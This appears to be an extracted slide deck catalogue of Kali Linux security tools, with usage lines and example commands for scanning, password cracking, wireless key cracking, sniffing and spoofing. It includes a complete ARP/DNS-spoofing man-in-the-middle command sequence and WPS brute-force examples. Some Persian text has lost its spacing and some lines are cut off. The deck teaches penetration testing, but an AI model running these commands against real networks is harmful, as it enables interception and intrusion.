Kali linux useful tools
- 4. There are several categories
Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications / Password Attacks
Wireless Attacks / Exploitation Tools
Sniffing/Spoofing / Maintaining Access
Reverse Engineering
Stress Testing / Hardware Hacking
Forensics / Reporting Tools
System Services
- 5. Information Gatheringاین،منوشاملمجموعهابزارهاییبرایجمعآوریاطالعاتاست.
Vulnerability Analysisدراینجامجموعهابزارهاییبرایتحلیل های پذیربآسیقرارگرفته
است.
Web Applicationsمجموعهابزارهاییبرایآزموننفوذبرنامههایکاربردیمبتنیبروبدر
اینمنوقراردادهشدهاست.
Password Attacksاین،منوشاملمجموعهابزارهاییبرایشکستن هایهکلمعبوراست.
Wireless Attacksمجموعهابزارهاییبرایحمالترویبستر هایهشبک سیمیبدراینجا
گردآوریشدهاست.
Exploitation Toolsدر،اینجامجموعهابزارهاییبرایاجرایکدهاینفوذExploitوجوددارد.
Sniffing/Spoofingاین،منوشاملمجموعهابزارهاییبرایشنودوجعلاست.
MaintainingAccessاین،منوشاملمجموعهابزارهاییبرایحفظدسترسیایجادشدهطی
مراحلنفوذاست.
Reverse Engineeringشاملمجموعهابزارهاییبرایانجاممهندسیمعکوساست.
Stress Testingمجموعهابزارهاییبرایانجام هاینآزموتستباردراینمنوقابلمشاهده
است.
Hardware Hackingاین،منوشاملمجموعهابزارهاییبراینفوذبه هایمسیستArduino
است.
Forensicsدراینقسمتمجموعهابزارهاییبرایبازرسیقانونیوجوددارد.
Reporting Toolsاین،منوشاملمجموعهابزارهاییبرای گیریشگزارو آوریعجمعالئم
است.
- 6. Information Gathering Tools
NMAP and ZenMAP
یکیازقدرتمندتریناسکنرهایدرزمینهکشفportبازمیباشدکهدر2محیط
کامندیباترمینالوگرافیکیمیباشدکهبادستورzenmapمحیطگرافیکی
برایشمابازخواهدشد.
nmap –p0-65535 <Target IP>
- 7. dnsenum
dnsenum is to gather as much information as
possible about a domain
USAGE : dnsenum.pl [options] <domain>
EXAMPLE : ./dnsenum.pl -p 1 -s 1 google.com
- 8. dnsmap
The tool enables to discover all subdomains
associated to a given domain
USAGE: ./dnsmap <target-domain> [options]
EXAMPLE: ./dnsmap google.com
- 10. wafw00f
Web Application Firewalls (WAFs) can be detected
through stimulus/response testing scenarios.
USAGE: python wafw00f.py <url>
EXAMPLE: python wafw00f.py google.com
- 11. arping
arping pings a destination by sending ARP
REQUEST packets to a neighbour host
USAGE: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination
EXAMPLE: arping -f -c 1 -I wlan0 192.168.100.1 (Host 192.168.100.1 is alive ->
Received 1 response(s))
- 14. Netcat
Netcat is a general-purpose command-line tool for reading, writing,
redirecting, and encrypting data across a network. It aims to be your
network Swiss Army knife, handling a wide variety of security testing
and administration tasks.
USAGE: ncat [options] <url>
EXAMPLE: ncat -C mail.example.com 25 (sending email to an SMTP server. Read manual for further steps)
EXAMPL:E ncat -l localhost 143 --sh-exec "ncat --ssl imap.example.com 993“ (connecting to an IMPA server )
- 16. intrace
InTrace is a traceroute-like application that enables users to
enumerate IP hops exploit.
USAGE: intrace [options] <url>
EXAMPLE: ./intrace --h www.freescale.com (Locally initiated TCP
connection) ng existing TCP connections,
- 17. sslscan
SSLScan is a fast SSL port scanner.
USAGE: sslscan [Options] [host:port | host]
EXAMPLE: sslscan 209.85.146.17
- 18. tlssled
TLSSLed is a Linux shell script whose purpose is to
evaluate the security of a target SSL/TLS (HTTPS) web
server implementation. It is based on sslscan
USAGE: TLSSLed <url> <port>
EXAMPLE: ./TLSSLed.sh www.owasp.org 443
- 19. cisco-auditing-tool
Cisco Auditing Tool - Perl script which scans cisco
routers for common vulnerabilities. Checks for default
passwords, easily guessable community names, and the
IOS history bug,....
USAGE: ./CAT [options]
- 20. ssldump
Ssldump is an network protocol analyzer
specially for SSLv3/TLS.
EXAMPLE: ssldump -i eth0 port 443 (listen to traffic on interface eth0 port 443)
- 21. sslstrip
sslstrip provides of the HTTPS attacks. It will transparently
hijack HTTP traffic on a network,
USAGE: sslstrip.py -l <listenPort>
- 22. cdpsnarf
CDPSnarf if a network sniffer exclusively written to
extract information from CDP packets
USAGE: cdpsnarf -i <device>
EXAMPLE: ./cdpsnarf eth2
CDP (Cisco router Discovery Protocol)
- 26. oscanner
Oscanner is an Oracle assessment
framework developed in Java.
USAGE: oscanner -s <ip> -r <repfile> [options]
EXAMPLE: oscanner.sh -s 192.168.0.1
- 28. sqlninja
Sqlninja is a tool targeted to exploit SQL Injection
vulnerabilities on a web application
http://sqlninja.sourceforge.net/sqlninja-howto.html
- 29. FUZZING TOOLS
Bed
BED (aka Bruteforce Exploit Detector) is a plain-text protocol
fuzzer that checks software for common vulnerabilities like
buffer overflows, format string bugs, integer overflows, etc.
The tool currently supports following protocols: finger, ftp,
http, imap, irc, lpd, pjl, pop, smtp
USAGE: ./bed.pl -s <plugin> [options]
EXAMPLE: ./bed.pl -s HTTP -t 192.168.100.16 -p 80
- 30. powerfuzzer
Powerfuzzer is a highly automated and fully customizable web
fuzzer (HTTP protocol based application fuzzer)
- Cross Site Scripting (XSS)
- Injections (SQL, LDAP, code, commands, and XPATH)
- CRLF
- 31. nikto
Nikto is web server scanner
USAGE: nikto.pl [host] [target] [options]
http://cirt.net/nikto2-docs/options.html
- 32. WEB APPLICATIONS: CMS IDENTIFACTION
Wpscanis a black box WordPress vulnerability scanner.
USAGE: wpscan.rb –url [target ip] [options]
OPTIONS http://wpscan.org/
- 34. webslayer
WebSlayer is a tool designed for brute forcing Web Applications, it can
be used to discover not linked resources (directories, servlets, scripts,
etc), brute force GET and POST parameters, brute force forms
parameters (User/Password), fuzzing, etc.
USAGE: GUI tool
More info:
https://www.owasp.org/index.php/Category:OWASP_Webslayer_Project
- 35. websploit
WebSploit is used to scan and analysis remote system in order
to find various type of vulnerabilities.WebSploit is used for:
Scan, Crawler & Web Analysis, Automatic Exploiter and
Support Network Attacks.
USAGE: GUI tool
- 36. xsser
Cross Site "Scripter" (aka XSSer) is an
automatic -framework- to detect, exploit
and report XSS vulnerabilities in web-
based applications.
USAGE: xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
EXAMPLE: python xsser.py -u http://host.com (Simple injection from URL)
- 37. zaproxy
The OWASP Zed Attack Proxy (ZAP) is an easy to use
integrated penetration testing tool for finding
vulnerabilities in web applications.
USAGE GUI tool
https://code.google.com/p/zaproxy/
- 38. Vega
Vega is an open source platform to test the security of web
applications. Vega can help you find and validate SQL
Injections, Cross-Site Scripting (XSS),
USAGE: GUI tool
- 39. dirb
DIRB is a Web Content Scanner. It looks for existing
(and/or hidden) Web Objects.
- 40. grabber
Grabber is a web application scanner. Basically it
detects some kind of vulnerabilities in your website.
Features
Cross-Site Scripting
SQL Injection (there is also a special Blind SQL Injection module)
File Inclusion
Backup files check
Simple AJAX check
USAGE: grabber.py [options]
- 41. joomscan
joomscan detects file inclusion, SQL injection, command
execution vulnerabilities of a target Joomla! web site.
USAGE: joomscan.pl -u <string> -x proxy:port
https://www.owasp.org/index.php/OWASP_Joomla_Vulnerability_S
canner_Usage
- 42. w3af
w3af is a Web Application Attack and Audit Framework.vulnerabilities like
(blind) SQL injections, OS commanding, remote file inclusions (PHP), cross-site
scripting (XSS), and unsafe file uploads, can be exploited in order to gain
different types of access.
More info: http://w3af.org/
USAGE: GUI tool
- 43. cmospwd
CmosPwd is a cmos/bios password recovery tool.
More info: http://www.cgsecurity.org/cmospwd.txt
USAGE: cmospwd [/d]
- 44. crunch
crunch is a tool for creating bruteforce wordlists which can be
used to audit password strength.
USAGE: crunch [min length] [max length] [ character set] [options]
EXAMPLE: ./crunch 6 6 0123456789ABCDEF
- 45. Hashcat
Hashcat is the world’s fastest CPU-based password recovery
tool.
USAGE : hashcat [options] hashfile [mask|wordfiles|directories]
OPTIONS: http://hashcat.net/wiki/doku.php?id=hashcat
- 46. hash-identifier
hash-identifier is a software to identify the different types of hashes used to
encrypt data and especially passwords
EXAMPLE:
python ./Hash_ID_v1.1.py
Submit your hash:
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
- 47. john the ripper
John the Ripper (JTR) is a free password cracking software
tool. It is one of the most popular password testing and
breaking programs.
USAGE: john [OPTIONS] [PASSWORD-FILES]
Example:
john -single crackme.txt (Single crack mode)
john -wordfile:password.lst crackme.txt (dictionary attack)
- 48. ophcrack
Ophcrack is a free open source (GPL licensed) program
that cracks Windows passwords by using LM hashes
through rainbow tables.
USAGE: GUI tool
- 49. RainbowCrack
RainbowCrack is a computer program which generates
rainbow tables to be used in password cracking.
USAGE: rcrack rainbow_table_pathname -h hash
rainbow tableجداولیازپیش
محاسبهشدهبهمنظور
معکوسکردنتوابعدرهم
سازیباشدیم.اینجداول
بهمنظورشکستنرمزهای
درهمسازیشدهبهکار
گرفتهشوندیم.
- 50. cewl
CeWL is a ruby app which spiders a given url to a
specified depth, optionally following external links.
USAGE: cewl [OPTION] ... URL
OPTIONS: http://www.digininja.org/projects/cewl.php
- 51. Hydra
THC-Hydra is a very fast (multi-threaded) network logon cracker which
supports many different services: afp, cisco, cisco-enable, cvs,
firebird, ftp, http-get, http-head, http-proxy, https-get, https-head,
https-form-get, https-form-post, icq, imap, imap-ntlm, ldap2, ldap3,
mssql, mysql, ncp, nntp, oracle-listener, pcanywhere, pcnfs, pop3,
pop3-ntlm, postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, smtp-
auth, smtp-auth-ntlm, snmp, socks5, ssh2, svn, teamspeak, telnet,
vmauthd, vnc.
OPTIONS http://www.aldeid.com/wiki/Thc-hydra#Usage
- 52. bluelog
Bluelog is a Bluetooth scanner designed to tell you how
many discoverable devices there are in an area as
quickly as possible.
USAGE: bluelog [options]
OPTIONS: https://github.com/MS3FGX/Bluelog
EXAMPLE: bluelog –vtn
- 53. bluemaho
BlueMaho is GUI-shell (interface) for suite of tools for testing
security of Bluetooth devices. It is freeware, opensource,
written on python.
More info: http://wiki.thc.org/BlueMaho
USAGE: GUI tool
- 54. RFID/NFC TOOLS: NFC TOOLS
nfc-list
nfc-list is a application which allows userspace
application access to NFC devices
More info: http://nfc-tools.org/index.php?title=Main_Page
USAGE: nfc-list
- 55. WIRELESS TOOLS
Aircrack-ng
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program
that can recover keys once enough data packets have been captured.
More info: www.aircrack-ng.org
EXAMPLE: aircrack-ng -a 2 -w dictionary.txt handshake-01.cap
- 56. aireplay-ng
aireplay-ng is used to inject/replay frames. The primary
function is to generate traffic for the later use in aircrack-ng for
cracking the WEP and WPA-PSK keys.
USAGE: aireplay-ng [options] <replay interface>
- 57. airmon-ng
airmon-ng is script can be used to enable monitor mode
on wireless interfaces.
USAGE: airmon-ng <start|stop> <interface> [channel]
EXAMPLE: airmon-ng start mon0
- 58. airodump-ng
airodump-ng is used for packet capturing of raw 802.11
frames for the intent of using them with aircrack-ng.
USAGE: airodump-ng [options] <interface name>
- 59. cowpatty
cowpatty - brute-force dictionary
attack against WPA-PSK.
USAGE: cowpatty [options]
OPTIONS :http://www.willhackforsushi.com/code/cowpatty/4.3/README
- 60. Fern Wifi Cracker
Fern Wifi Cracker is a Wireless security auditing and attack
software program that is able to crack and recover WEP/WPA/WPS
keys and also run other network based attacks on wireless or
Ethernet based networks.
More info: https://code.google.com
/p/fern-wifi-cracker/
USAGE: GUI tool
- 61. Kismet
Kismet is an 802.11 layer2 wireless network detector,
sniffer, and intrusion detection system.
OPTIONS: http://www.irongeek.com/i.php?page=backtrack-
r1-man-pages/kismet
- 62. wifi-honey
wifi-honey works out what encryption a client is looking for in
a given network by setting up four fake access points, each
with a different type of encryption - None, WEP, WPA and
WPA2 - and then observing which of the four the client
connects to.
USAGE: ./wifi_honey.sh <essid> <channel> <interface>
- 63. reaver
Reaver implements a brute force attack against
WiFi Protected Setup which can crack the WPS
pin of an access point
USAGE: reaver -i <interface> -b <target bssid> -vv
EXAMPLE: reaver -i mon0 -b 00:01:02:03:04:05
TIP https://code.google.com/p/reaver-wps/wiki/HintsAndTips
- 64. searchsploit
searchsploit - a shell script to search a local repository
of exploitdb
USAGE: searchsploit [term1] [term2] [term3]
EXAMPLE: searchsploit oracle windows local
- 66. darkstat
darkstat is a packet sniffer that runs as a background
process, gathers all sorts of statistics about network
usage, and serves them over HTTP.
OPTIONS :http://linux.die.net/man/8/darkstat
- 67. dnsspoof
dnsspoof forges replies to arbitrary DNS address / pointer queries on
the LAN. This is useful in bypassing hostname-based access controls,
or in implementing a variety of man-in-the-middle attacks
USAGE: dnsspoof [-i interface] [-f hostsfile] [expression]
EXAMPLE :
# echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
# arpspoof -t 192.168.1.245 192.168.1.5 &;
# arpspoof -t 192.168.1.5 192.168.1.245 &;
# dnsspoof -f spoofhosts.txt host 192.168.1.245 and udp port 53
- 68. Ettercap
Ettercap is a comprehensive suite for
man in the middle attacks.
More info:
http://ettercap.github.io/ettercap/
- 70. macchanger
macchanger is a Linux utility for viewing/manipulating
the MAC address for network interfaces.
USAGE: macchanger [options] device
EXAMPLE: macchanger eth1
EXAMPLE: macchanger --mac=01:23:45:67:89:AB eth1
- 72. iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is
used by the Asterisk PBX.
USAGE: ./iaxflood sourcename destinationname
numpackets
- 73. cymothoa
Cymothoa is a stealth backdooring tool, that inject
backdoor's shellcode into an existing process.
OPTIONS :http://cymothoa.sourceforge.net/
- 74. proxychains
proxychains - a tool that forces any TCP connection made by
any given application to follow through proxy like TOR or any
other SOCKS4, SOCKS5 or HTTP(S) proxy.
USAGE: proxychains command
EXAMPLE: proxychains telnet victim.com
- 76. jad
Jad (Java Decompiler) is a currently unmaintained
decompiler for the Java programming language.
- 77. apktool
APKTool is an application which decompiles and recompiles
android APKs. It is a tool for reverse engineering.
- 78. JavaSnoop
JavaSnoop is a tool for testing (re: hacking) Java desktop
applications or applets.
More info; http://javasnoop.googlecode.com/svn-
history/r32/trunk/resources/README.txt
USAGE: GUI tool
- 79. radare2
radare- the reverse engineering framework. Radare2 is an open source
tool to disassemble, debug, analyze and manipulate binary files.
OPTIONS http://www.makelinux.net/man/1/R/radare2
- 80. macof
macof floods the local network with random MAC addresses
(causing some switches to fail open in repeating mode,
facilitating sniffing).
USAGE: macof [-i interface] [-s src] [-d dst] [-e tha] [-x
sport] [-y dport] [-n times]
- 81. siege
siege - An HTTP/HTTPS stress tester.
Siege is a multi-threaded http load
testing and benchmarking utility.
USAGE: siege [options] [url]
OPTIONS: http://linux.die.net/man/1/siege
EXAMPLE: siege -c25 -t1M www.example.com
- 83. DIGITAL FORENSICS
bulk_extractor is a C++ program that scans a disk image, a file,
or a directory of files and extracts useful information without
parsing the file system or file system structures.
- 84. foremost
Recover files from a disk image based on file types specified by the user
using the -t switch. Supports: jpg, gif, png, bmp, avi, exe, mpg, wav, riff,
wmv, mov, pdf, ole, doc, zip, rar, htm, cpp)
USAGE: foremost [-h][-V][-d][-vqwQT][-b<blocksize>][-o<dir>][-
t<type>][-s<num>][-i<file>]
OPTIONS:
http://manpages.ubuntu.com/manpages/hardy/en/man1/foremost.1.html
EXAMPLE: foremost -s 100 -t jpg -i image.dd (Search for jpeg format skipping the first 100 blocks)
- 85. rahash2
rahash2 - radare tool for creating
hashes.
EXAMPLE: rahash2 -a md5 -s 'hello world'
- 86. References
http://www.aldeid.com
http://www.morningstarsecurity.com
http://www.hackingdna.com
http://zer0byte.com/2013/03/19/kali-linux-complete-tools-list-installation-screen-shots/
http://www.monkey.org/~dugsong/fragroute/
http://www.sans.org/security-resources/idfaq/fragroute.php
http://flylib.com/books/en/3.105.1.82/1/
http://www.darknet.org.uk/2008/04/cdpsnarf-cdp-packet-sniffer/
http://mateslab.weebly.com/dnmap-the-distributed-nmap.html
http://www.tuicool.com/articles/raimMz
http://backtrackwasneversoeasy.blogspot.co.uk/2012/02/terminating-internet-of-whole-network.html
http://www.ethicalhacker.net
http://nmap.org/ncat/guide/ncat-tricks.html
http://nixgeneration.com/~jaime/netdiscover/
http://csabyblog.blogspot.co.uk
http://thehackernews.com
https://code.google.com/p/wol-e/wiki/Help
http://linux.die.net/man/1/xprobe2
http://www.digininja.org/projects/twofi.php
https://code.google.com/p/intrace/wiki/intrace
https://github.com/iSECPartners/sslyze/wiki
http://www.securitytube-tools.net/index.php@title=Braa.html
http://security.radware.com
- 87. The way of the world is one
This is the right path